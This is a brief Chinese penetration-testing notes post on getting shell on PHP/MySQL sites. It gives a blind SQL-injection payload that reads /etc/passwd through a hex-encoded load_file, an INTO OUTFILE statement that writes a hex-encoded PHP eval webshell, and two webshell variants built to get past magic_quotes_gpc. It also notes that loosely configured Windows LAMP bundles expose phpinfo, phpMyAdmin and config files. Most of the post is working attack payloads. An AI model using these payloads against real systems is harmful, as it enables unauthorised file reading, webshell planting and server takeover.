渗透小记

第一次渗透测试中拿到了getshell的站点,其中遇到的一些问题,也简单记录下

sql-injection

select substr(load_file(0x2f6574632f706173737764),1,1);

可用于盲注读取文件

select 0x3c3f706870206576616c28245f504f53545b315d293b3f3e into outfile 'test.php';

可直接写shell,但是如果存在 addslashes等转义函数或者magic_quotes_gpc=On则无法写入 文件名处必须是 单引号或者双引号明标的

getshell

phpmyadmin不受magic_quotes_gpc=On影响,sql语句可以正确执行

<?php
eval(base64_decode($_POST[1]));
?>
<?php
eval(stripslashes($_POST[1]));
?>

写入的shell绕过magic_quotes_gpc=On,这里要注意ini_set('magic_quotes_gpc','Off');无法绕过

服务器配置问题

Windows中的一些LAMP服务套件自带phpinfophpmyadmin为渗透测试提供了方便,而且套件为了即装即用,在权限的管理上比较宽松,往往存在注入或者代码执行或者命令执行时,可以读取相应服务的配置文件

此处评论已关闭